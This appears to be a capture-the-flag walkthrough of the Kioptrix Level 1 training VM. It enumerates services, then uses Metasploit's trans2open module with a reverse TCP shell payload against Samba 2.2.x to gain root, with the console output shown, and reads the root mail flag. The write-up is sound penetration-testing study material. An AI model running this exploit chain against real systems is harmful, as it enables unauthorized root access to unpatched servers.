Coffee Difficulty Rating:

Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Service Enumeration

Port Service Version Detection

TCP: 22


OpenSSH 2.9p2 (protocol 1.99)

TCP: 80


Apache httpd 1.3.20 ((Unix)

TCP: 111

RPC Bind


TCP: 139



TCP: 443


Apache httpd 1.3.20 ((Unix)

Samba Enumeration

Based on the age of the system other services, I know from exeperience that SAMBA is likely vulnerable to the trans2open exploit.

use exploit/linux/samba/trans2open

msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  yes       The target address
   RPORT  139              yes       The target port

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

Metasploit Exploit

msf exploit(trans2open) > run

[*] [2015.12.20-21:05:39] Started reverse handler on
[*] [2015.12.20-21:05:40] Trying return address 0xbffffdfc...
[*] [2015.12.20-21:05:41] Trying return address 0xbffffcfc...
[*] [2015.12.20-21:05:42] Trying return address 0xbffffbfc...
[*] [2015.12.20-21:05:43] Trying return address 0xbffffafc...
[*] Command shell session 1 opened ( -> at 2015-12-20 21:05:44 -0500

Background session 1? [y/N]  N

uid=0(root) gid=0(root) groups=99(nobody)
Background session 1? [y/N]  y

Root Flag

Root Flag

sh-2.05# cd /var/spool/mail
cd /var/spool/mail
sh-2.05# ls
sh-2.05# cat root   
cat root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
    by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
    for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...